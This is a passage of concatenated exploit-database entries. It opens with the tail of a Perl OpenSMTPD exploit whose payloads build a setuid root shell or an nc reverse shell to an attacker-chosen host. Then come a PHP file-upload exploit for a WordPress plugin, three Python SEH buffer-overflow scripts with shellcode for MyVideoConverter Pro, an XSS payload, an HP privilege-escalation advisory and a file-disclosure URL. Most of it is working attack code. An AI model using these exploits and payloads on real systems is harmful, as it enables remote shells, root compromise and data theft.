# /bin/sh: warning: won't have full job control
# phish# id
# uid=0(root) gid=0(wheel) groups=0(wheel)
#
# Vulnerable platforms (OpenSMTPD 6.4.0 - 6.6.1):
# OpenBSD 6.6 [tested]
# OpenBSD 6.5 [untested]
# OpenBSD 6.4 [untested]
# Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 [tested]
# Other Linux distributions [untested]
# FreeBSD [untested]
# NetBSD [untested]
# 

use IO::Socket::INET;

print "raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD\n";
print "Copyright (c) 2020 Marco Ivaldi <raptor\@0xdeadbeef.info>\n\n";

$usage = "Usage:\n".
"$0 LPE\n".
"$0 RCE <remote_host> <local_host> [<domain>]\n";
$lport = 4444;

($type, $rhost, $lhost, $domain) = @ARGV;
die $usage if (($type ne "LPE") && ($type ne "RCE"));

# Prepare the payload
if ($type eq "LPE") { # LPE
  $payload = "cp /bin/sh /usr/local/bin/pwned\n".
"echo 'main(){setuid(0);setgid(0);system(\"/bin/sh\");}'> /tmp/pwned.c\n".
"gcc /tmp/pwned.c -o /usr/local/bin/pwned\nchmod 4777 /usr/local/bin/pwned";
  $rhost = "127.0.0.1";
} else { # RCE
  die $usage if ((not defined $rhost) || (not defined $lhost));
  $payload = "sleep 5;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|".
"nc $lhost $lport >/tmp/f";
}

# Open SMTP connection
$| = 1;
$s = IO::Socket::INET->new("$rhost:25") or die "Error: $@\n";

# Read SMTP banner
$r = <$s>;
print "< $r";
die "Error: this is not OpenSMTPD\n" if ($r !~ /OpenSMTPD/);

# Send HELO
$w = "HELO fnord";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Send evil MAIL FROM
$w = "MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Send RCPT TO
if (not defined $domain) {
  $rcpt = "<root>";
} else {
  $rcpt = "<root\@$domain>";
}
$w = "RCPT TO:$rcpt";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Send payload in DATA
$w = "DATA";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
$w = "\n#0\n#1\n#2\n#3\n#4\n#5\n#6\n#7\n#8\n#9\n#a\n#b\n#c\n#d\n$payload\n.";
#print "> $w\n"; # uncomment for debugging
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Close SMTP connection
$s->close();
print "\nPayload sent, please wait 5 seconds...\n";

# Got root?
if ($type eq "LPE") { # LPE
  sleep 5;
  print `ls -l /usr/local/bin/pwned`;
  exec "/usr/local/bin/pwned" or die "Error: exploit failed :(\n";
} else { # RCE
  exec "nc -vl $lport" or die "Error: unable to execute netcat\n"; # BSD netcat
  #exec "nc -vlp $lport" or die "Error: unable to execute netcat\n"; # Debian netcat
}

[-] Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload
[-] Author: mehran feizi
[-] Category: webapps
[-] Date: 2020.02.11
[-] vendor home page: https://wordpress.org/plugins/contact-form-7/

Vulnerable Source:
134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file))
82: $file = $_FILES[$name] : null;
132: $new_file = path_join($uploads_dir, $filename);
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
121: $uploads_dir = wpcf7_upload_tmp_dir();
131: $filename = wp_unique_filename($uploads_dir, $filename);
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
121: $uploads_dir = wpcf7_upload_tmp_dir();
128: $filename = apply_filters('wpcf7_upload_file_name', $filename,
$file['name'], $tag);
126: $filename = wpcf7_antiscript_file_name ($filename);
125: $filename = wpcf7_canonicalize ($filename, 'as-is');
124: $filename = $file['name'];
82: $file = $_FILES[$name] : null;
82: $file = $_FILES[$name] : null;
78: ⇓ function wpcf7_file_validation_filter($result, $tag)


Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("
http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php
");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>

Location File:
http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg

#Exploit Title: MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-11
#Vendor Homepage : http://www.ivideogo.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a


## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "Shell.txt".
#2. Just copy the text inside "Shell.txt".
#3. Start the program. In the new window click "Add"> "Convert DVD"> "Movie" .
#4. Now paste the content of "Shell.txt" into the field: "Video Folder"> Click "..."
#5. The calculator runs successfully


#!/usr/bin/python 

from struct import pack

buffer = "\x41" * 268
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x1004f3e3)
#0x1004f3e3 : pop ebx # pop esi # ret  |  {PAGE_EXECUTE_READ} [mysubtitle.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)
shellcode =  ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode
try:
    f=open("Shell.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"


#Exploit Title: MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-11
#Vendor Homepage : http://www.ivideogo.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a


## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "exploit.txt".
#2. Just copy the text inside "exploit.txt".
#3. Start the program. In the new window click "Options"> "Settins" .
#4. Now paste the content of "exploit.txt" into the field: "Output Folder"> Click "..."
#5. The calculator runs successfully


#!/usr/bin/python 

from struct import pack

buffer = "\x41" * 268
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10045ebb)
#0x10045ebb : pop edi # pop ebx # ret | {PAGE_EXECUTE_READ} [mysubtitle.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)
shellcode =  ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"


# Exploit Title: MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow
# Exploit Author : ZwX
# Exploit Date: 2020-02-11
# Vendor Homepage : http://www.ivideogo.com/
# Tested on OS: Windows 10 v1803
# Social: twitter.com/ZwX2a


## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "Shell.txt".
#2. Just copy the text inside "Shell.txt".
#3. Start the program. In the new window click "Add"> "Convert DVD"> "TVSeries" .
#4. Now paste the content of "Shell.txt" into the field: "Video Folder"> Click "..."
#5. The calculator runs successfully


#!/usr/bin/python 

from struct import pack

buffer = "\x41" * 268
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10039291)
#0x10039291 : pop ecx # pop ebx # ret 0x04 |  {PAGE_EXECUTE_READ} [mysubtitle.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll)
shellcode =  ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode
try:
    f=open("Shell.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

[-] Tile: Wordpress Plugin tutor.1.5.3 - Cross-Site Scripting
[-] Author: mehran feizi
[-] Category: webapps
[-] Date: 2020.02.12
===================================================================
Vulnerable page:
/Quiz.php
===================================================================
Vulnerable Source:
473: echo echo $topic_id;
447: $topic_id = sanitize_text_field($_POST['topic_id']);
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/classes/Quiz.php     and
$_POST('topic_id')=   <script>alert('mehran')</script>
=================================================================================

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/HP-SYSTEM-EVENT-UTILITY-LOCAL-PRIVILEGE-ESCALATION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.hp.com


[Product]
HP System Event Utility


The genuine HPMSGSVC.exe file is a software component of HP System Event Utility by HP Inc.
HP System Event Utility enables the functioning of special function keys on select HP devices.


[Vulnerability Type]
Local Privilege Escalation



[CVE Reference]
CVE-2019-18915



[Security Issue]
The HP System Event service "HPMSGSVC.exe" will load an arbitrary EXE and execute it with SYSTEM integrity.
HPMSGSVC.exe runs a background process that delivers push notifications.

The problem is that HP Message Service will load and execute any arbitrary executable named "Program.exe"
if found in the users c:\ drive.

Path: C:\Program Files (x86)\HP\HP System Event\SmrtAdptr.exe

Two Handles are inherit, properties are Write/Read
Name: \Device\ConDrv

This results in arbitrary code execution persistence mechanism if an attacker can place an EXE in this location
and can be used to escalate privileges from Admin to SYSTEM.

HP has/is released/releasing a mitigation: https://support.hp.com/us-en/document/c06559359


[References]
PSR-2019-0204
https://support.hp.com/us-en/document/c06559359



[Network Access]
Local


[Disclosure Timeline]
Vendor Notification:  October 7, 2019
HP PSRT "product team will address the issue in next release" : January 13, 2020
HP advisory and mitigation release : February 10, 2020
February 11, 2020 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

[-] Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
[-] Author: mehran feizi
[-] Category: webapps
[-] Date: 2020.02.12
[-] vendor home page: https://wordpress.org/plugins/wordfence/
==============================================================================
Vulnerable Source:
5662: readfile readfile($localFile);
5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '',
sanitize_text_field($_GET['file']));
=================================================================================
Exploit:
localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD]
=================================================================================
contact me:
telegram: @MF0584
gmail: mehranfeizi13841384@gmail.com